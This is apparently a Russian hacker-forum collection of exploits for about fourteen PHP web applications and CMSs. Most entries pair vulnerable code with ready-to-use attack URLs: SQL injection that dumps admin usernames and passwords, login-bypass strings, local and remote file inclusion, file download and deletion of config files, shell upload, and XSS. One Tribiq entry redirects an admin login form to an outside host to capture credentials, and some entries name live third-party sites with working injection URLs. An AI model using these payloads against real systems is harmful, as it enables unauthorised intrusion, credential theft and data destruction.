print("<br><br>\n");
print("</td></tr>\n");
print("</table>\n");
}
}...Result:
http://localhost/kure-0.6.2/index.php?post=../config.php%00

админко - admin/

пасивная XSS
/index.php
...plug($type, "top");
if(!file_exists($type . "s/" . $filename . ".txt")) {
print("The requested file <tt>" . $type . "s/" . $filename . ".txt</tt> does not exist.\n");...Result:
http://localhost/kure-0.6.2/index.php?post=%3Cscript%3Ealert%28123%29%3C/script%3E

Дорк: powered by kure

Music Box v 3.3 :D
SQL:

/news.php?action=edit&newsid=-1+union+select+1,2,3,4,5+--+
/album.php?eid=-1+union+select+1,2,3,4,5,6,7,8,9,10+--+
/blog-detail.php?id=-1+union+select+1,2,3,4,5+--+
/genre_albums.php?id=-1+or(1,1)=(select+count(0),concat((select+database ()+from+information_schema.tables+limit+0,1),floor (rand(0)*2))from(information_schema.tables)group+b y+2)--+
/news-detail.php?id=-1+union+select+1,2,3,4,5+--+
/songs.php?eid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19+--+

Need mq off:
/images.php?type=album&aid=-1'+union+select+version()+--+
(<img src=5.0.45-community-nt>)



Пассивная XSS:
/download_songs.php?song=-1%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E // Хотя это скуля, ну крутить я нехочу)
/mygpic.php?picname=%3C/title%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E
/news-detail.php?id=%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E

Need Register_globals:
/directlinking.php?count=1&filename=%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E

Скачиваем любой файл:
/forcedownload.php?file=sources/configure.php -- Качаем
/forcedownload.php?file=sources/configure.php%00 -- Смотрим в браузере
/streamm3u.php?file=sources/configure.php -- Скачается в формате m3u ;)

Раскрытие:
/opendir.php

"Мы разработчики MusicBox, и мы дураки, взяли блин не поставили проверку на авторизацию, или мы не дураки и оставили эти баги для траффа для хекеров, кароче какую песню хотите такую и редактируйте!"
/songs.php?eid=1

Льём шелл:
/up.php -- помоему баян, видел где-то :) По дефолту в /audio/ -- На офф сайте стадо баранов уже видать в теме что залиться через этот файл можно, так что делетнут он там :)


// Вы чо гоните, это лишь одна часть файлов, я блин обосрался когда по другим файлам ходил.

Bling Web Log
SQL ing
target: index.php
index.php...if (!$staffid)
{
echo "<font size=2>Signup for an account <a href=\"signup.php\">here</a><br> if you dont already have one.\n";
echo "<br><p>\n";
echo "<form name=elform action=login.php method=post>\n";
echo "<table cellpadding=0 cellspacing=0>\n";
echo "<tr>\n";
echo "<td class=body>Username: </td>\n";
echo "<td><input type=text name=handle size=15></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td class=body>Password: </td>\n";
echo "<td><input type=password name=password size=15></td>\n";
echo "</tr>\n";
echo "</table>\n";
echo "<br>\n";
echo "<center><input type=submit value=Login></center>\n";
echo "</form>\n";
}...Обработчик формы: login.php...include("./includes/inc.php");

$handle=cleanup($handle);
$password=md5($password);

$staffinfo=getrow("select id, handle, level
from staff where handle='$handle' and status=7 and password='$password'");

$staffid=$staffinfo['id'];

if(!$staffid)
{
header ("location:index.php?error=baddlogin");
exit();
}

$staffname=$staffinfo['handle'];
$stafflevel=$staffinfo['level'];...
includes/inc.php
include("./includes/bling_config.php");
include("./includes/functions.php");
include/blind_config.phpfunction getrows($query)
{
$query=stripSlashes($query);

if (!$result=mysql_query($query))
die(deadjim(mysql_errno(), mysql_error(), $query));
else
{
$row_array[0][0]=$rows=mysql_num_rows($result);

$row_array[0][1]=$fields=mysql_num_fields($result);

for ($i=1; $i<=$rows; $i++)
{
$row_array[$i]=mysql_fetch_array($result);
}
mysql_free_result($result);
}
return $row_array;
}......function cleanup($copy)
{
$copy=trim($copy);
//$copy=htmlspecialchars($copy, ENT_QUOTES);
//$copy=eregi_replace ("%", "%", $copy);
//$copy=eregi_replace ("<", "&lt;", $copy);
//$copy=eregi_replace ("&amp;", "&", $copy);
//$copy=eregi_replace("&lt;b", "<b", $copy);
//$copy=eregi_replace("&lt;/b", "</b", $copy);
//$copy=eregi_replace("&lt;i", "<i", $copy);
//$copy=eregi_replace("&lt;/i", "</i", $copy);
//$copy=eregi_replace("&lt;u", "<u", $copy);
//$copy=eregi_replace("&lt;/u", "</u", $copy);
//$copy=eregi_replace("&lt;a", "<a", $copy);
//$copy=eregi_replace("&lt;/a", "</a", $copy);
//$copy=eregi_replace("&lt;img","<img", $copy);
$copy=nl2br($copy);
$copy=StripSlashes($copy);
return($copy);
}...Result:
в поле с логином admin' or 1=1/*
пасс любой

ps
Скрипт древний, потому работает тока с rg=on
В гугле вроде ниче небыло по уязвимостям!

PokerMax Poker

не понял я что за покер там, искал себе сорцы поиграть :D

SQL
Условия: MQ = off
файл : pokerleague_.php (везде может отличаться название)

$plrows = $sql->execute ( "SELECT * FROM ".$player_table." WHERE playerid='" . $cgi->getValue ( "pid" ) . "'",

sploit : http://localhost/pokerleague/pokerleague_.php?op=showplayer&pid=-Salcifuful%27+/*!UNION*/+SELECT+1,2,concat_Ws%280x3a,username,password%29, 4,5,6,7,8,9,10+from+pokermax_admin%23


Админко хек
Условия: MQ = off
Файл : index.php (он же логиниться)

if (isset($_POST["op"]) && ($_POST["op"]=="adminlogin"))
{
mysql_connect($server, $DBusername, $DBpassword) or die ("$DatabaseError");
mysql_select_db($database);
$query = "SELECT * FROM $admin_table WHERE username='".$_POST['username']."' AND password='".$_POST['password']."'";

splot:
ну собственно идем в админку и
login: ' or 1=1%23
pass: anoxyi4to xoTb 3DECb 6bl/\ Bac9|

Удалим что нить?
в админке файл : backup.php (Делает бэкупс)


unlink($backup_dir."/" . getParam("delzip",""));

$backup_dir - по умолчанию вроде backup
такссс....ни че не фильтруется и т.д. ->
делаем
Sploit :
http://localhost/pokerleague/pokeradmin/backup.php?delzip=../../includes/config.php
(кол-во ../ может отличаться от здесьнаписаного)
по замысловатому замыслу он удалится

ЗЫ там еще скули в админке, думаю они не так важны уже

ЗЫЫ иногда прокатывает в админку зайти с
login:admin
pass:admin

CuteMarks 1.0.2


Blind SQL inj
(если условие верно, то редирект!)

link_href.php
include "./include/config.inc";
include "./include/cm_functions.inc";

#Get the superglobal variable(s) before using them:
$lnk_id = $_GET['lnk_id'];

# Make database connection and construct admin main screen
mysql_pconnect("$db_address:$db_port", $db_user, $db_password) or db_error;
mysql_select_db($db_name) or db_error;

# An empty database produces a special message
$sql = "SELECT lnk_url, lnk_hits FROM cm_links WHERE lnk_id=$lnk_id";
$return = mysql_query($sql) or db_error;
$row = mysql_fetch_array($return) or db_error;
$url = $row[0];
$hits = $row[1] + 1;
$sql = "UPDATE cm_links SET lnk_hits = $hits WHERE lnk_id=$lnk_id";
mysql_query($sql) or db_error;
header("Location: $url");include/cm_functions.phpfunction db_error($exit_flag) {
echo "A database error occured, please try again<br>";
$exit_flag AND exit;Result:
http://localhost/cutemarks_1-0-2/link_href.php?lnk_id=[sql]
http://localhost/cutemarks_1-0-2/link_href.php?lnk_id=1+and+4=substring%28version%2 8%29,1,1%29--+

SQL inj
include "./include/config.inc";
include "./include/template.inc";
$lnk_id = $_GET['lnk_id'];

# Load the template, retreive information from the database and fill
# in the template
mysql_pconnect("$db_address:$db_port", $db_user, $db_password) or db_error;
mysql_select_db($db_name) or db_error;
$sql = "SELECT lnk_parent_id, lnk_name FROM cm_links WHERE lnk_id = $lnk_id";
$result = mysql_query($sql) or db_error;
$row = mysql_fetch_array($result) or db_error;
$tpl = new Template("./$tpl_path", "remove");
$tpl->set_file("admin_move_lnk", "admin_move_lnk.tpl");
$tpl->set_block("admin_move_lnk", "cat_list", "foo");
$tpl->set_var(array ("CSS_FILE" => $css_file,
"lnk_name" => htmlentities($row[1]),
"node_exp" => $node_exp,
"lnk_id" => $lnk_id ));
$pID = $row[0];

# Create a pulldown form element with all available categories
$sql = "SELECT cat_id, cat_name FROM cm_categories ORDER BY cat_name";
$result = mysql_query($sql) or db_error;
while ($row = mysql_fetch_array($result)) {
$tpl->set_var(array("cat_id" => $row[0],
"cat_label" => $row[1]));
if ($row[0] == $pID) {
$tpl->set_var("cat_selected", "selected");
} else {
$tpl->set_var("cat_selected", "");
}
$tpl->parse("foo", "cat_list", TRUE);
}
$tpl->pparse("out", "admin_move_lnk");
Result:
http://localhost/cutemarks_1-0-2/admin_move_lnk.php?lnk_id=[sql]
http://localhost/cutemarks_1-0-2/admin_move_lnk.php?lnk_id=-1+union+select+1,version%28%29You want to move the link "5.1.40-community" to a new category. Please choose one of the available categories from the list and submit the change.SQL inj
admin_rename_cat.php
include "./include/config.inc";
include "./include/template.inc";

$cat_id = $_GET['cat_id'];
$node_exp = $_GET['node_exp'];

# Load the template, retreive information from the database and fill
# in the template
mysql_pconnect("$db_address:$db_port", $db_user, $db_password) or db_error;
mysql_select_db($db_name) or db_error;
$sql = "SELECT cat_name FROM cm_categories WHERE cat_id = $cat_id";
$result = mysql_query($sql) or db_error;
$row = mysql_fetch_array($result) or db_error;
$tpl = new Template("./$tpl_path", "remove");
$tpl->set_file("admin_rename_cat", "admin_rename_cat.tpl");
$tpl->set_var(array ("CSS_FILE" => $css_file,
"cat_name" => htmlentities($row[0]),
"node_exp" => $node_exp,
"cat_id" => $cat_id ));
$tpl->pparse("out", "admin_rename_cat");Result:
http://localhost/cutemarks_1-0-2/admin_rename_cat.php?cat_id=[sql]
http://localhost/cutemarks_1-0-2/admin_rename_cat.php?cat_id=-1+union+select+version%28%29--+
Дырявый как # дальше не хочеться смотреть!

OsDate CMS
Сайт: http://www.tufat.com/
Версия: 2.54, последняя на данный момент.


Информация о таблицах:
../dbtest.php

Таким образом можно узнать префикс.


PHP-Info:

../admin/phpinfo.php
(права не нужны)


Раскрытия путей:

есть папка с именем forum, в ней лежат api для взаимодействия с установленными форумами, если же форумов нет, то выдаёт самые разнообразные ошибки(инклюд несуществующих файлов, ввызовы несуществующих функций) с раскрытием путей.

Список файлов:
../forum/smf_1-1_api.php
../forum/adminLogin.php
../forum/forum_db.php
../forum/myBB14_forum.php
../forum/myBB_forum.php
../forum/Phorum_forum.php
../forum/phpBB3_forum.php
../forum/phpBB_forum.php
../forum/smf11_forum.php
../forum/vBulletin_forum.php
../forum/userLogin.php

Также другие файлы:
../news.php?config[no_news]=asdf
../test.php
../chat/inc/cmses/osdateCMS_v25.php

XSS(пассивная):

../afflogin.php?errormsg=<sCript>alert(111);</sCript>

Отсутствует фильтрация.

RFI(register globals = On):
../forum/adminLogin.php?config[forum_installed]=http://site/index.php%00
../forum/userLogin.php?config[forum_installed]=../../../../../../../../../etc/passwd%00

Code:

if ( $config['forum_installed'] == '' || $config['forum_installed'] == 'None' ) {
include_once('None_forum.php');
} else {
include_once($config['forum_installed'] . '_forum.php');
}


Ранее уже выкладывалась.

Версия: 1.2.4 Final

RFI(register globals = on и, как я понял, сервер на винде, тк в Юникс системах регистр имеет значение):
/manager/tools/link/dbinstall.PhP?_PX_config[manager_path]=path%00

Уязвимый код:
if (basename($_SERVER['SCRIPT_NAME']) == 'dbinstall.php') exit;

include $_PX_config[manager_path] . "/path/lib/";

Саму идею обойти защиту путём изменения регистра предложили в этом посту: https://forum.antichat.ru/showpost.php?p=1704870&postcount=234 , однако порой этот файл редактируют, а ведь точно такая же уязвимость есть и в файле, указанном выше.

Раскрытия путей:

В папке ../manager/tools/* в каждой папке выдает ошибку, связанную с тем, что они используют функции, определённый в файлах, которые их подключают.

../manager/help.php?c[]=article&mode=
../manager/users.php?user_id[]=1
../manager/comments.php?op=all'

XSS(passive):
../manager/tools/visualedit/index.php?msg="><sCript>alert(111);</sCript>


SQL-иньекция(админка):
../manager/tools.php?p=link&id=-4+union+select+1,2,3,4,5,6,7&page=edit_link



Также можно узнать версию движка, обратившись к файлу, указанному ниже:

../manager/VERSION

product:cms id 1.1.1
site:www.cmsid.co.cc

1)SQL-injection

file:application/views/views.php


$id=$_GET['id'];
$hasil = mysql_query("select * from id_views where id=$id");


result:

/index.php?application=views&id=-9+union+select+1,2,concat_ws(0x3a,name,password),4 ,5,6+from+id_users+--+


2)SQL-injection

file: application/moduls/news/news.php

case 'views':
$id=$_GET['id'];
$hasil = mysql_query("select * from id_news where id=$id");


result:

index.php?application=moduls&type=news&action=views&id=-14+union+select+1,2,concat_ws(0x3a,name,password), 4,5,6,7,8,9,10,11,12,13+from+id_users+--+


3)LFI(требования: mq=off)

file: index.php
бесит отсутствие отступов ><

switch($_GET['application']) {
....
case 'moduls':
if (file_exists(dir_modul.$_GET['type'].'/'.$_GET['type'].'.php'))
{
require_once(dir_modul.$_GET['type'].'/'.$_GET['type'].'.php');
}else {
header("location:index.php");
exit;
}
break;


result:

/index.php?application=moduls&type=../../[local_file]%00

Suppy 0.5.4
Suppy is a small supportsystem based on PHP and MySQL. Beta !
Homepage: http://sourceforge.net/projects/suppy/

Пассивная XSS:
/login.php?error=%3Cscript%3Ealert();%3C/script%3E

Auth ByPass
/login.php
В Anmeldename:
1' or 1=1 /*
Passwort:
12345
Exploit:


<form method="post" action="http://site.com/login.php">
<input name="name" type="text" value="1' or 1=1 -- " />
<input name="pw" type="password" value="Ulalala"/>
<input name="login" type="submit" value="Login" />



SQL Inj:
/bb/getfile.php?id=-1+union+select+1,2,3,4,5,6,7,8+--+

Code:

if(isset($_GET['id']) && isset($_SESSION['ID_user']))
{
include_once('utils/dbcon.php');
$con = new DBcon();
$con->AddSQL("SELECT * FROM file ");
$con->AddSQL("WHERE ID_file=".$_GET['id']);

Concrete CMS

-Пассивная XSS


http://www.concrete5.org/search/-/search/?query=%3E%22%3Cscript%3Ealert%28%27xss%27%29%3C%2 Fscript%3E&submit=Go+%BB

******************
оффсайт:
http://www.concrete5.org/
скачать:
http://www.concrete5.org/download_file/-/view/12742/

Tribiq CMS 5.2.2b

Пассивная XSS:
/admin/adminlogin.php?desturl=%22%3E%3Cscript%3Ealert();% 3C/script%3E
Мутим чётко и дезрко (c):
Need: mg=off, хотя х.з., js такая весчь что можно и без кавычек обойтись.
/admin/adminlogin.php?desturl=%22%3E%3CSCRIPT%3Edocument. forms[0].action='http://xenk/index.php';%3C/script%3E

До изменения:
<form action="adminlogin.php" method="POST" name="f">


После изменения:
<form action="http://xenk/index.php" method="POST" name="f">

Админ вводит пасс/логин, и данные идут не в adminlogin.php, а в http://xenk/index.php.

v.1.0 RyShell CMS

SQL Injection
пример сайта с этой кмс
http://www.papiorec.org/index.php?url=-8+union+select+unhex%28hex%28version%28%29%29%29--

на офф сайте тоже имеется SQL Injection:
http://www.ryshell.com/index2.php?url=-25+UNiON+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,unhex%28hex%28version%28%29%29%29,18,19,20,21--

хотя в админку можно попасть минуя авторизацию:)
http://www.ryshell.com/admin/admin.php

ecoCMS
Site: www.ecocms.com
Vulnerability: Authorization bypass
Severity: High
Needs: register_globals=On
Exploit: /admin.php?_SESSION[user_in]=1
Reason: В admin.php переменная сессии $_SESSION['user_in'] определяется лишь если переданы неправильный логин и пароль:
<?php

/*
ecoCMS - Quick & easy to use Content Management System (CMS)
(c)2009 by ecoCMS.com - visit for PRO version.
*/

include('config.php');
if($_GET['panel']=='logout')session_destroy();

if($_POST['user'] && $_POST['pass']){
// user is trying to login here.
// verify his user/pass.
if($_POST['user']==constant('accessUser') && $_POST['pass']==constant('accessPass'))
$_SESSION['user_in']=1;
else
$Message = 'Username or password incorrect!';
}

if(!$_SESSION['user_in'])$HideContents=1;
else unset($HideContents);

?>

В admin.php переменная сессии $_SESSION['user_in'] определяется лишь если переданы неправильный логин и пароль. Следовательно. мы можем не передавая post-данные с логином и паролем, установить значение переменной сессии при register_globals=On.

ISPmanager 4.3 Professional

Пассивная XSS:
/ispmgr?func=%3C/script%3E%22%3E%3Cscript%3Ealert();%3C/script%3E

Campsite (3.3.5)
Site: campsite.campware.org
Vulnerability: Remote File Inclusion || Local File Inclusion
Severity: High
Needs: register_globals=On
Exploit: /tests/test_autopublish.php?GLOBALS[g_campsiteDir]=RFI ; /classes/ObjectType.php?GLOBALS[g_campsiteDir]=RFI
Reason: В tests/test_autopublish.php, /classes/ObjectType.php и в других скриптах часто используемая глобальная переменная g_campsiteDir не определена. Она определена лишь в скрипте set_path.php, который в самом вышеуказанном скрипте не подключается.
Участок кода в tests/test_autopublish.php:
<?php
require_once($GLOBALS['g_campsiteDir']."/classes/Article.php");
require_once($GLOBALS['g_campsiteDir']."/classes/ArticlePublish.php");
require_once($GLOBALS['g_campsiteDir']."/classes/Issue.php");
require_once($GLOBALS['g_campsiteDir']."/classes/IssuePublish.php");
...
Участок кода в /classes/ObjectType.php:
<?php
/**
* @package Campsite
*/

/**
* Includes
*/
require_once($GLOBALS['g_campsiteDir'].'/classes/DatabaseObject.php');
require_once($GLOBALS['g_campsiteDir'].'/classes/Translation.php');

Следовательно. мы можем установить значение глобальной переменной и заинклудить произвольный файл при register_globals=On.
При allow_url_include=On/Off имеем RFI/LFI соответственно. Для проведения LFI скорее всего понадобится ещё и magic_quotes_gpc=On для того, чтобы обрезать лишнее нулл-байтом.
При register_globals=Off имеем лишь раскрытие путей.